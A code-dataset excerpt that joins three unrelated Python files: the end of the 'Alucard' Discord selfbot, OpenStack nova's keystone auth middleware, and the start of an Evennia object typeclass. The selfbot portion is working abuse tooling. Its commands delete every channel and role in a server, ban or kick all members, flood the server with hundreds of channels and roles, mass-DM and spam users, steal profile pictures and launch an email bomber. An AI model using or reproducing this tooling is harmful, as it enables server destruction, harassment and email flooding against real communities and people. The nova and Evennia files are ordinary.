                        await x.create_text_channel(f"{chann}")
            try:
                await g.edit(icon=ctx.guild.icon_url)
            except:
                pass
@Alucard.command()
async def destroy(ctx): # b'\xfc'
    """Wreck the current guild: delete channels/roles, ban members, rename it,
    then flood it with 250 random channels and 250 random roles.

    Each step swallows permission errors so it does as much as it is allowed to.
    """
    await ctx.message.delete()
    for channel in list(ctx.guild.channels):
        try:
            await channel.delete()
        except:
            pass
    for user in list(ctx.guild.members):
        try:
            await user.ban()
        except:
            pass
    for role in list(ctx.guild.roles):
        try:
            await role.delete()
        except:
            pass
    try:
        # RandString/RandomColor are helpers defined elsewhere in this file.
        await ctx.guild.edit(
            name=RandString(),
            description="https://alucard.wtf",
            reason="https://alucard-selfbot.github.io",
            icon=None,
            banner=None
        )
    except:
        pass
    for _i in range(250):
        await ctx.guild.create_text_channel(name=RandString())
    for _i in range(250):
        await ctx.guild.create_role(name=RandString(), color=RandomColor())
# --- Mass-action commands: each loops over guild objects and ignores
# --- per-item failures (missing permissions, rate limits) individually.
@Alucard.command()
async def dmall(ctx, *, message): # b'\xfc'
    """DM every guild member the same message, 5s apart (crude rate limit)."""
    await ctx.message.delete()
    for user in list(ctx.guild.members):
        try:
            await asyncio.sleep(5)
            await user.send(message)
        except:
            pass
@Alucard.command()
async def massban(ctx): # b'\xfc'
    """Ban every member the account can ban."""
    await ctx.message.delete()
    for user in list(ctx.guild.members):
        try:
            await user.ban()
        except:
            pass
@Alucard.command()
async def masskick(ctx): # b'\xfc'
    """Kick every member the account can kick."""
    await ctx.message.delete()
    for user in list(ctx.guild.members):
        try:
            await user.kick()
        except:
            pass
@Alucard.command()
async def massrole(ctx): # b'\xfc'
    """Create 250 randomly named/coloured roles; stops on the first failure."""
    await ctx.message.delete()
    for _i in range(250):
        try:
            await ctx.guild.create_role(name=RandString(), color=RandomColor())
        except:
            return
@Alucard.command()
async def masschannel(ctx): # b'\xfc'
    """Create 250 randomly named text channels; stops on the first failure."""
    await ctx.message.delete()
    for _i in range(250):
        try:
            await ctx.guild.create_text_channel(name=RandString())
        except:
            return
@Alucard.command()
async def delchannels(ctx): # b'\xfc'
    """Delete every channel; stops on the first failure."""
    await ctx.message.delete()
    for channel in list(ctx.guild.channels):
        try:
            await channel.delete()
        except:
            return
@Alucard.command()
async def delroles(ctx): # b'\xfc'
    """Delete every role it can; skips failures."""
    await ctx.message.delete()
    for role in list(ctx.guild.roles):
        try:
            await role.delete()
        except:
            pass
@Alucard.command()
async def massunban(ctx): # b'\xfc'
    """Unban everyone on the guild's ban list, 2s apart."""
    await ctx.message.delete()
    banlist = await ctx.guild.bans()
    for users in banlist:
        try:
            await asyncio.sleep(2)
            await ctx.guild.unban(user=users.user)
        except:
            pass
@Alucard.command()
async def spam(ctx, amount: int, *, message): # b'\xfc'
    """Send the same message *amount* times in the current channel."""
    await ctx.message.delete()
    for _i in range(amount):
        await ctx.send(message)
@Alucard.command()
async def dm(ctx, user : discord.Member, *, message): # b'\xfc'
    """DM a single member.

    NOTE(review): on a selfbot ctx.author is normally the bot account, so the
    guard below appears to always return early — the condition looks inverted;
    verify the intended behavior before changing it.
    """
    await ctx.message.delete()
    user = Alucard.get_user(user.id)
    if ctx.author.id == Alucard.user.id:
        return
    else:
        try:
            await user.send(message)
        except:
            pass
@Alucard.command(name='get-color', aliases=['color', 'colour', 'sc'])
async def _get_color(ctx, *, color: discord.Colour): # b'\xfc'
    """Render a 200x90 swatch of the given colour and post it as an embed image."""
    await ctx.message.delete()
    file = io.BytesIO()
    # Draw the swatch in memory with PIL and rewind the buffer for upload.
    Image.new('RGB', (200, 90), color.to_rgb()).save(file, format='PNG')
    file.seek(0)
    em = discord.Embed(color=color, title=f'Showing Color: {str(color)}')
    # The embed references the attached file by its attachment:// name.
    em.set_image(url='attachment://color.png')
    await ctx.send(file=discord.File(file, 'color.png'), embed=em)
@Alucard.command()
async def tinyurl(ctx, *, link): # b'\xfc'
    """Shorten a URL with the TinyURL API and post the result."""
    await ctx.message.delete()
    short = requests.get(f'http://tinyurl.com/api-create.php?url={link}').text
    embed = discord.Embed()
    embed.add_field(name='Shortened link', value=short, inline=False)
    await ctx.send(embed=embed)
@Alucard.command(aliases=['rainbow-role'])
async def rainbow(ctx, *, role): # b'\xfc'
    """Recolour a role with a random colour every 10 seconds until editing fails.

    Fix: the original passed an invalid `role=role` keyword to Role.edit(),
    which raised TypeError on the first iteration and broke out immediately —
    the command never actually cycled colours. Also bail out when no role
    with the given name exists instead of crashing on None.
    """
    await ctx.message.delete()
    role = discord.utils.get(ctx.guild.roles, name=role)
    if role is None:
        return
    while True:
        try:
            await role.edit(colour=RandomColor())
            await asyncio.sleep(10)
        except:
            # Stop on any failure (deleted role, lost permissions, ...).
            break
@Alucard.command(name='8ball')
async def _ball(ctx, *, question): # b'\xfc'
    """Answer a question magic-8-ball style with a random canned response."""
    await ctx.message.delete()
    responses = (
        'That is a resounding no',
        'It is not looking likely',
        'Too hard to tell',
        'It is quite possible',
        'That is a definite yes!',
        'Maybe',
        'There is a good chance',
    )
    embed = discord.Embed()
    embed.add_field(name="Question", value=question, inline=False)
    embed.add_field(name="Answer", value=random.choice(responses), inline=False)
    embed.set_thumbnail(url="https://www.horoscope.com/images-US/games/game-magic-8-ball-no-text.png")
    embed.set_footer(text=datetime.datetime.now())
    await ctx.send(embed=embed)
@Alucard.command(aliases=['slots', 'bet'])
async def slot(ctx): # b'\xfc'
    """Spin a three-reel fruit slot machine and report the outcome."""
    await ctx.message.delete()
    emojis = "🍎🍊🍐🍋🍉🍇🍓🍒"
    a, b, c = (random.choice(emojis) for _ in range(3))
    header = f"**[ {a} {b} {c} ]\n{ctx.author.name}**,"
    if a == b == c:
        outcome = f"{header} All matchings, you won!"
    elif a == b or a == c or b == c:
        outcome = f"{header} 2 in a row, you won!"
    else:
        outcome = f"{header} No match, you lost"
    await ctx.send(embed=discord.Embed.from_dict({"title": "Slot machine", "description": outcome}))
@Alucard.command()
async def joke(ctx): # b'\xfc'
    """Fetch a random dad joke from icanhazdadjoke.com and post it."""
    await ctx.message.delete()
    headers = {"Accept": "application/json"}
    async with aiohttp.ClientSession() as session:
        async with session.get("https://icanhazdadjoke.com", headers=headers) as resp:
            payload = await resp.json()
    await ctx.send(payload["joke"])
@Alucard.command(name='auto-bump', aliases=['bump'])
async def _auto_bump(ctx, channelid): # b'\xfc'
    """Send '!d bump' (the Disboard bump command) to a channel every 2 hours, forever."""
    await ctx.message.delete()
    count = 0
    # Intentional infinite loop — the task runs for the bot's lifetime.
    while True:
        try:
            count += 1
            channel = Alucard.get_channel(int(channelid))
            await channel.send('!d bump')
            print(f'{Fore.BLUE}[AUTO-BUMP] {Fore.GREEN}Bump number: {count} sent'+Fore.RESET)
            await asyncio.sleep(7200)
        except Exception as e:
            print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
@Alucard.command()
async def tts(ctx, *, message): # b'\xfc'
    """Synthesise the message with the module-level do_tts helper and upload it as a WAV."""
    await ctx.message.delete()
    buff = await do_tts(message)
    await ctx.send(file=discord.File(buff, f"{message}.wav"))
@Alucard.command()
async def upper(ctx, *, message): # b'\xfc'
    """Echo the message back in upper case."""
    await ctx.message.delete()
    message = message.upper()
    await ctx.send(message)
@Alucard.command(aliases=['guildpfp'])
async def guildicon(ctx): # b'\xfc'
    """Post the current guild's icon as an embed image."""
    await ctx.message.delete()
    em = discord.Embed(title=ctx.guild.name)
    em.set_image(url=ctx.guild.icon_url)
    await ctx.send(embed=em)
@Alucard.command(name='backup-f', aliases=['friendbackup', 'friend-backup', 'backup-friends', 'backupf'])
async def _backup_f(ctx): # b'\xfc'
    """Append the account's friend and blocked lists (name#discriminator per line)
    to Backup/Friends.txt and Backup/Blocked.txt.

    Fix: the original re-opened each backup file inside the loop for every
    single entry; each file is now opened once.
    """
    await ctx.message.delete()
    with open('Backup/Friends.txt', 'a+') as f:
        for friend in Alucard.user.friends:
            f.write(f"{friend.name}#{friend.discriminator}\n")
    with open('Backup/Blocked.txt', 'a+') as f:
        for block in Alucard.user.blocked:
            f.write(f"{block.name}#{block.discriminator}\n")
@Alucard.command(name='first-message', aliases=['firstmsg', 'fm', 'firstmessage'])
async def _first_message(ctx, channel: discord.TextChannel = None): # b'\xfc'
    """Link to the very first message of a channel (defaults to the current channel)."""
    await ctx.message.delete()
    if channel is None:
        channel = ctx.channel
    # oldest_first with limit=1 yields exactly the channel's first message.
    first_message = (await channel.history(limit=1, oldest_first=True).flatten())[0]
    embed = discord.Embed(description=first_message.content)
    embed.add_field(name="First Message", value=f"[Jump]({first_message.jump_url})")
    await ctx.send(embed=embed)
@Alucard.command()
async def mac(ctx, mac): # b'\xfc'
    """Look up the vendor of a MAC address via macvendors.com and post it."""
    await ctx.message.delete()
    vendor = requests.get('http://api.macvendors.com/' + mac).text
    embed = discord.Embed(title='MAC Lookup Result', description=vendor, colour=0xDEADBF)
    embed.set_author(name='MAC Finder', icon_url='https://regmedia.co.uk/2016/09/22/wifi_icon_shutterstock.jpg?x=1200&y=794')
    await ctx.send(embed=embed)
@Alucard.command()
async def abc(ctx): # b'\xfc'
    """Send the first letter of the (Spanish) alphabet, then edit through the rest every 2s."""
    await ctx.message.delete()
    letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
               'n', 'ñ', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
    message = await ctx.send(letters[0])
    await asyncio.sleep(2)
    for letter in letters[1:]:
        await message.edit(content=letter)
        await asyncio.sleep(2)
async def _crypto_price(ctx, symbol, display_name, icon_url):
    """Fetch USD/EUR prices for *symbol* from cryptocompare and send them as an embed.

    Shared helper for the btc/eth commands, which were copy-pasted duplicates.
    """
    r = requests.get(f'https://min-api.cryptocompare.com/data/price?fsym={symbol}&tsyms=USD,EUR')
    r = r.json()
    em = discord.Embed(description=f"USD: `{r['USD']}$`\nEUR: `{r['EUR']}€`")
    em.set_author(name=display_name, icon_url=icon_url)
    await ctx.send(embed=em)
@Alucard.command(aliases=['bitcoin'])
async def btc(ctx): # b'\xfc'
    """Post the current Bitcoin price in USD and EUR."""
    await ctx.message.delete()
    await _crypto_price(ctx, 'BTC', 'Bitcoin',
                        'https://cdn.pixabay.com/photo/2013/12/08/12/12/bitcoin-225079_960_720.png')
@Alucard.command(aliases=['ethereum'])
async def eth(ctx): # b'\xfc'
    """Post the current Ethereum price in USD and EUR."""
    await ctx.message.delete()
    await _crypto_price(ctx, 'ETH', 'Ethereum',
                        'https://cdn.discordapp.com/attachments/271256875205525504/374282740218200064/2000px-Ethereum_logo.png')
@Alucard.command()
async def topic(ctx): # b'\xfc'
    """Scrape a random conversation topic from conversationstarters.com and post it."""
    await ctx.message.delete()
    r = requests.get('https://www.conversationstarters.com/generator.php').content
    # bs4 here is the BeautifulSoup constructor (imported elsewhere in this file).
    soup = bs4(r, 'html.parser')
    topic = soup.find(id="random").text
    await ctx.send(topic)
@Alucard.command(aliases=['wouldyourather', 'would-you-rather', 'wyrq'])
async def wyr(ctx): # b'\xfc'
    """Scrape a 'would you rather' question and post it as one embed."""
    await ctx.message.delete()
    r = requests.get('https://www.conversationstarters.com/wyrqlist.php').text
    soup = bs4(r, 'html.parser')
    # The page splits the question into three elements: option A, "or", option B.
    qa = soup.find(id='qa').text
    qor = soup.find(id='qor').text
    qb = soup.find(id='qb').text
    em = discord.Embed(description=f'{qa}\n{qor}\n{qb}')
    await ctx.send(embed=em)
@Alucard.command()
async def hastebin(ctx, *, message): # b'\xfc'
    """Upload the message to hastebin and post the resulting document link."""
    await ctx.message.delete()
    r = requests.post("https://hastebin.com/documents", data=message).json()
    await ctx.send(f"<https://hastebin.com/{r['key']}>")
@Alucard.command()
async def ascii(ctx, *, text): # b'\xfc'
    """Render text as ASCII art via artii.herokuapp.com and post it in a code block."""
    await ctx.message.delete()
    r = requests.get(f'http://artii.herokuapp.com/make?text={urllib.parse.quote_plus(text)}').text
    # Discord rejects messages over 2000 characters, so bail out silently.
    if len('```'+r+'```') > 2000:
        return
    await ctx.send(f"```{r}```")
# --- NSFW image commands: each fetches a random image URL from the
# --- nekos.life API (a different endpoint per command) and posts it
# --- as an embed image. Identical structure throughout.
@Alucard.command()
async def anal(ctx): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/anal")
    res = r.json()
    em = discord.Embed()
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def erofeet(ctx): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/erofeet")
    res = r.json()
    em = discord.Embed()
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def feet(ctx): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/feetg")
    res = r.json()
    em = discord.Embed()
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def hentai(ctx): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/Random_hentai_gif")
    res = r.json()
    em = discord.Embed()
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def boobs(ctx): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/boobs")
    res = r.json()
    em = discord.Embed()
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def tits(ctx): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/tits")
    res = r.json()
    em = discord.Embed()
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def blowjob(ctx): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/blowjob")
    res = r.json()
    em = discord.Embed()
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def lewdneko(ctx): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/nsfw_neko_gif")
    res = r.json()
    em = discord.Embed()
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def lesbian(ctx): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/les")
    res = r.json()
    em = discord.Embed()
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
# --- Roleplay commands: each fetches a random reaction GIF from the
# --- nekos.life API and posts it in an embed that mentions the target
# --- member. Identical structure throughout.
@Alucard.command()
async def feed(ctx, user: discord.Member): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/feed")
    res = r.json()
    em = discord.Embed(description=user.mention)
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def tickle(ctx, user: discord.Member): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/tickle")
    res = r.json()
    em = discord.Embed(description=user.mention)
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def slap(ctx, user: discord.Member): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/slap")
    res = r.json()
    em = discord.Embed(description=user.mention)
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def hug(ctx, user: discord.Member): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/hug")
    res = r.json()
    em = discord.Embed(description=user.mention)
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def smug(ctx, user: discord.Member): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/smug")
    res = r.json()
    em = discord.Embed(description=user.mention)
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def pat(ctx, user: discord.Member): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/pat")
    res = r.json()
    em = discord.Embed(description=user.mention)
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command()
async def kiss(ctx, user: discord.Member): # b'\xfc'
    await ctx.message.delete()
    r = requests.get("https://nekos.life/api/v2/img/kiss")
    res = r.json()
    em = discord.Embed(description=user.mention)
    em.set_image(url=res['url'])
    await ctx.send(embed=em)
@Alucard.command(aliases=['proxy'])
async def proxies(ctx): # b'\xfc'
    """Download fresh proxy lists (http/https/socks4/socks5) from proxyscrape
    and append them, one proxy per line, to the matching files under Data/.

    Fixes: the original repeated the same stanza four times and opened every
    file with a bare open() that was never closed (leaked handles, buffered
    writes possibly lost). Files are now opened with `with`, once each.
    """
    await ctx.message.delete()
    sources = {
        'Data/Http-proxies.txt': 'http',
        'Data/Https-proxies.txt': 'https',
        'Data/Socks4-proxies.txt': 'socks4',
        'Data/Socks5-proxies.txt': 'socks5',
    }
    for path, proxy_type in sources.items():
        res = requests.get(f'https://api.proxyscrape.com/?request=displayproxies&proxytype={proxy_type}&timeout=1500')
        with open(path, 'a+') as f:
            # One proxy per line; skip blank lines in the response.
            for proxy in res.text.split('\n'):
                proxy = proxy.strip()
                if proxy:
                    f.write(proxy + "\n")
@Alucard.command()
async def uptime(ctx): # b'\xfc'
    """Report how long the selfbot has been running (microseconds stripped)."""
    await ctx.message.delete()
    elapsed = datetime.datetime.utcnow() - start_time
    await ctx.send(f"`{str(elapsed).split('.')[0]}`")
@Alucard.command()
async def purge(ctx, amount: int): # b'\xfc'
    """Delete the selfbot's own messages among the last *amount* in this channel."""
    await ctx.message.delete()
    # Note: the original chained a no-op .map(lambda m: m); dropped here.
    own_messages = ctx.message.channel.history(limit=amount).filter(lambda m: m.author == Alucard.user)
    async for message in own_messages:
        try:
            await message.delete()
        except:
            pass
@Alucard.command(name='group-leaver', aliase=['leaveallgroups', 'leavegroup', 'leavegroups'])
async def _group_leaver(ctx): # b'\xfc'
    """Leave every group DM the account is in.

    NOTE(review): the decorator kwarg is spelled `aliase` — presumably
    `aliases` was intended, so these aliases likely never register; verify.
    """
    await ctx.message.delete()
    for channel in Alucard.private_channels:
        if isinstance(channel, discord.GroupChannel):
            await channel.leave()
@Alucard.command()
async def help(ctx): # b'\xfc'
    """Open the online command reference in the local web browser (if reachable)."""
    await ctx.message.delete()
    url = 'https://alucard-selfbot.github.io/commands'
    r = requests.get(url)
    if r.status_code == 200:
        webbrowser.open(url)
    else:
        print('Page is currently under maintenance, our team will announce when the page is back online')
# --- Presence commands: set the account's rich-presence activity.
@Alucard.command()
async def stream(ctx, *, message): # b'\xfc'
    """Show a 'Streaming ...' presence; stream_url is a module-level constant."""
    await ctx.message.delete()
    stream = discord.Streaming(
        name=message,
        url=stream_url,
    )
    await Alucard.change_presence(activity=stream)
@Alucard.command()
async def game(ctx, *, message): # b'\xfc'
    """Show a 'Playing ...' presence."""
    await ctx.message.delete()
    game = discord.Game(
        name=message
    )
    await Alucard.change_presence(activity=game)
@Alucard.command()
async def listening(ctx, *, message): # b'\xfc'
    """Show a 'Listening to ...' presence."""
    await ctx.message.delete()
    await Alucard.change_presence(
        activity=discord.Activity(
            type=discord.ActivityType.listening,
            name=message,
        ))
@Alucard.command()
async def watching(ctx, *, message): # b'\xfc'
    """Show a 'Watching ...' presence."""
    await ctx.message.delete()
    await Alucard.change_presence(
        activity=discord.Activity(
            type=discord.ActivityType.watching,
            name=message
        ))
# --- Small utility/text commands.
@Alucard.command(aliases=['markasread', 'ack'])
async def read(ctx): # b'\xfc'
    """Mark every guild as read."""
    await ctx.message.delete()
    for guild in Alucard.guilds:
        await guild.ack()
@Alucard.command()
async def reverse(ctx, *, message): # b'\xfc'
    """Echo the message back reversed."""
    await ctx.message.delete()
    message = message[::-1]
    await ctx.send(message)
@Alucard.command()
async def shrug(ctx): # b'\xfc'
    await ctx.message.delete()
    shrug = r'¯\_(ツ)_/¯'
    await ctx.send(shrug)
@Alucard.command()
async def lenny(ctx): # b'\xfc'
    await ctx.message.delete()
    lenny = '( ͡° ͜ʖ ͡°)'
    await ctx.send(lenny)
@Alucard.command()
async def tableflip(ctx): # b'\xfc'
    await ctx.message.delete()
    tableflip = '(╯°□°)╯︵ ┻━┻'
    await ctx.send(tableflip)
@Alucard.command()
async def unflip(ctx): # b'\xfc'
    await ctx.message.delete()
    unflip = '┬─┬ ノ( ゜-゜ノ)'
    await ctx.send(unflip)
@Alucard.command()
async def bold(ctx, *, message): # b'\xfc'
    """Echo the message back in bold markdown."""
    await ctx.message.delete()
    await ctx.send('**'+message+'**')
@Alucard.command()
async def secret(ctx, *, message): # b'\xfc'
    """Echo the message back wrapped in spoiler tags."""
    await ctx.message.delete()
    await ctx.send('||'+message+'||')
@Alucard.command(name='role-hexcode', aliases=['rolecolor'])
async def _role_hexcode(ctx, *, role: discord.Role): # b'\xfc'
    """Post a role's name and hex colour code."""
    await ctx.message.delete()
    await ctx.send(f"{role.name} : {role.color}")
@Alucard.command(name='get-hwid', aliases=['hwid', 'gethwid', 'hwidget'])
async def _get_hwid(ctx): # b'\xfc'
await ctx.message.delete()
print(f"HWID: {Fore.YELLOW}{hwid}"+Fore.RESET)
@Alucard.command()
async def empty(ctx): # b'\xfc'
await ctx.message.delete()
await ctx.send(chr(173))
@Alucard.command()
async def everyone(ctx): # b'\xfc'
await ctx.message.delete()
await ctx.send('https://@everyone@google.com')
@Alucard.command()
async def logout(ctx): # b'\xfc'
await ctx.message.delete()
await Alucard.logout()
@Alucard.command(aliases=['btc-stream', 'streambtc', 'stream-btc', 'btcstatus'])
async def btcstream(ctx): # b'\xfc'
await ctx.message.delete()
btc_status.start()
@Alucard.command(name='steal-all-pfp', aliases=['steal-all-pfps', 'stealallpfps'])
async def _steal_all_pfp(ctx): # b'\xfc'
await ctx.message.delete()
Dump(ctx)
@Alucard.command(aliases=['clearconsole', 'consoleclear'])
async def cls(ctx): # b'\xfc'
await ctx.message.delete()
Clear()
startprint()
@Alucard.command()
async def nitro(ctx): # b'\xfc'
await ctx.message.delete()
await ctx.send(Nitro())
@Alucard.command(name='gmail-bomb', aliases=['gmail-bomber', 'gmailbomb', 'email-bomber', 'emailbomber'])
async def _gmail_bomb(ctx): # b'\xfc'
await ctx.message.delete()
GmailBomber()
if __name__ == '__main__':
    # Entry point: `Init` (defined elsewhere in this file) boots the client.
    Init()
| 36.761555 | 244 | 0.561934 |
b356bf9974e764585ccda306a861d59e349d5e11 | 5,834 | py | Python | nova/api/auth.py | osrg/nova | 14b6bc655145c832bd9c822e48f877818e0e53ff | [
"Apache-2.0"
] | null | null | null | nova/api/auth.py | osrg/nova | 14b6bc655145c832bd9c822e48f877818e0e53ff | [
"Apache-2.0"
] | null | null | null | nova/api/auth.py | osrg/nova | 14b6bc655145c832bd9c822e48f877818e0e53ff | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common Auth Middleware.
"""
from oslo.config import cfg
import webob.dec
import webob.exc
from nova import context
from nova.openstack.common.gettextutils import _
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova import wsgi
# Configuration options controlling API auth behavior; registered on the
# global oslo.config CONF object below.
auth_opts = [
    cfg.BoolOpt('api_rate_limit',
                default=False,
                help=('Whether to use per-user rate limiting for the api. '
                      'This option is only used by v2 api. Rate limiting '
                      'is removed from v3 api.')),
    cfg.StrOpt('auth_strategy',
               default='noauth',
               help='The strategy to use for auth: noauth or keystone.'),
    cfg.BoolOpt('use_forwarded_for',
                default=False,
                help='Treat X-Forwarded-For as the canonical remote address. '
                     'Only enable this if you have a sanitizing proxy.'),
]

CONF = cfg.CONF
CONF.register_opts(auth_opts)

# Module-level logger for this middleware module.
LOG = logging.getLogger(__name__)
def _load_pipeline(loader, pipeline):
filters = [loader.get_filter(n) for n in pipeline[:-1]]
app = loader.get_app(pipeline[-1])
filters.reverse()
for filter in filters:
app = filter(app)
return app
def pipeline_factory(loader, global_conf, **local_conf):
    """A paste pipeline replica that keys off of auth_strategy."""
    strategy = CONF.auth_strategy
    spec = local_conf[strategy]
    if not CONF.api_rate_limit:
        # With rate limiting disabled, prefer the "<strategy>_nolimit"
        # pipeline if the paste config defines one.
        spec = local_conf.get(strategy + '_nolimit', spec)
    names = spec.split()
    # NOTE (Alex Xu): This is just for configuration file compatibility.
    # If the configuration file still contains 'ratelimit_v3', just ignore it.
    # We will remove this code at next release (J)
    if 'ratelimit_v3' in names:
        LOG.warn(_('ratelimit_v3 is removed from v3 api.'))
        names.remove('ratelimit_v3')
    return _load_pipeline(loader, names)
def pipeline_factory_v3(loader, global_conf, **local_conf):
    """A paste pipeline replica that keys off of auth_strategy."""
    names = local_conf[CONF.auth_strategy].split()
    return _load_pipeline(loader, names)
class InjectContext(wsgi.Middleware):
    """Add a 'nova.context' to WSGI environ."""

    def __init__(self, context, *args, **kwargs):
        # `context` is a fixed RequestContext attached to every request
        # passing through this middleware.
        self.context = context
        super(InjectContext, self).__init__(*args, **kwargs)

    @webob.dec.wsgify(RequestClass=wsgi.Request)
    def __call__(self, req):
        # Stash the canned context and continue down the WSGI stack.
        req.environ['nova.context'] = self.context
        return self.application
class NovaKeystoneContext(wsgi.Middleware):
    """Make a request context from keystone headers."""

    @webob.dec.wsgify(RequestClass=wsgi.Request)
    def __call__(self, req):
        # User id: prefer the newer X_USER_ID header, falling back to the
        # deprecated X_USER header. Reject the request outright if neither
        # is present.
        user_id = req.headers.get('X_USER')
        user_id = req.headers.get('X_USER_ID', user_id)
        if user_id is None:
            LOG.debug("Neither X_USER_ID nor X_USER found in request")
            return webob.exc.HTTPUnauthorized()

        roles = self._get_roles(req)

        if 'X_TENANT_ID' in req.headers:
            # This is the new header since Keystone went to ID/Name
            project_id = req.headers['X_TENANT_ID']
        else:
            # This is for legacy compatibility. NOTE: a missing X_TENANT here
            # raises KeyError (-> HTTP 500 via webob), which appears to be the
            # intended behavior for a malformed auth response.
            project_id = req.headers['X_TENANT']
        project_name = req.headers.get('X_TENANT_NAME')
        user_name = req.headers.get('X_USER_NAME')

        # Get the auth token (X_STORAGE_TOKEN is the legacy swift-style name).
        auth_token = req.headers.get('X_AUTH_TOKEN',
                                     req.headers.get('X_STORAGE_TOKEN'))

        # Build a context, including the auth_token...
        remote_address = req.remote_addr
        if CONF.use_forwarded_for:
            remote_address = req.headers.get('X-Forwarded-For', remote_address)

        # Optional JSON-serialized service catalog forwarded by the keystone
        # auth middleware; invalid JSON is a server-side error.
        service_catalog = None
        if req.headers.get('X_SERVICE_CATALOG') is not None:
            try:
                catalog_header = req.headers.get('X_SERVICE_CATALOG')
                service_catalog = jsonutils.loads(catalog_header)
            except ValueError:
                raise webob.exc.HTTPInternalServerError(
                    _('Invalid service catalog json.'))

        ctx = context.RequestContext(user_id,
                                     project_id,
                                     user_name=user_name,
                                     project_name=project_name,
                                     roles=roles,
                                     auth_token=auth_token,
                                     remote_address=remote_address,
                                     service_catalog=service_catalog)

        req.environ['nova.context'] = ctx
        return self.application

    def _get_roles(self, req):
        """Get the list of roles."""

        if 'X_ROLES' in req.headers:
            roles = req.headers.get('X_ROLES', '')
        else:
            # Fallback to deprecated role header:
            roles = req.headers.get('X_ROLE', '')
            if roles:
                LOG.warn(_("Sourcing roles from deprecated X-Role HTTP "
                           "header"))
        return [r.strip() for r in roles.split(',')]
| 36.4625 | 79 | 0.621872 |
3fa0c7e72195424af343bd34ae1496fbd4d81586 | 8,445 | py | Python | evennia/game_template/typeclasses/objects.py | lootcrawl/evennia | a5f736ca0ff89e4f7da7d3f89a8886f1ea3698aa | [
"BSD-3-Clause"
] | null | null | null | evennia/game_template/typeclasses/objects.py | lootcrawl/evennia | a5f736ca0ff89e4f7da7d3f89a8886f1ea3698aa | [
"BSD-3-Clause"
] | null | null | null | evennia/game_template/typeclasses/objects.py | lootcrawl/evennia | a5f736ca0ff89e4f7da7d3f89a8886f1ea3698aa | [
"BSD-3-Clause"
] | null | null | null | """
Object
The Object is the "naked" base class for things in the game world.
Note that the default Character, Room and Exit do not inherit from
this Object, but from their respective default implementations in the
evennia library. If you want to use this class as a parent to change
the other types, you can do so by adding this as a multiple
inheritance.
"""
from evennia import DefaultObject
class Object(DefaultObject):
    """
    This is the root typeclass object, implementing an in-game Evennia
    game object, such as having a location, being able to be
    manipulated or looked at, etc. If you create a new typeclass, it
    must always inherit from this object (or any of the other objects
    in this file, since they all actually inherit from BaseObject, as
    seen in src.object.objects).

    The BaseObject class implements several hooks tying into the game
    engine. By re-implementing these hooks you can control the
    system. You should never need to re-implement special Python
    methods, such as __init__ and especially never __getattribute__ and
    __setattr__ since these are used heavily by the typeclass system
    of Evennia and messing with them might well break things for you.

    * Base properties defined/available on all Objects

     key (string) - name of object
     name (string)- same as key
     dbref (int, read-only) - unique #id-number. Also "id" can be used.
     date_created (string) - time stamp of object creation
     account (Account) - controlling account (if any, only set together with
                       sessid below)
     sessid (int, read-only) - session id (if any, only set together with
                       account above). Use `sessions` handler to get the
                       Sessions directly.
     location (Object) - current location. Is None if this is a room
     home (Object) - safety start-location
     has_account (bool, read-only)- will only return *connected* accounts
     contents (list of Objects, read-only) - returns all objects inside this
                       object (including exits)
     exits (list of Objects, read-only) - returns all exits from this
                       object, if any
     destination (Object) - only set if this object is an exit.
     is_superuser (bool, read-only) - True/False if this user is a superuser

    * Handlers available

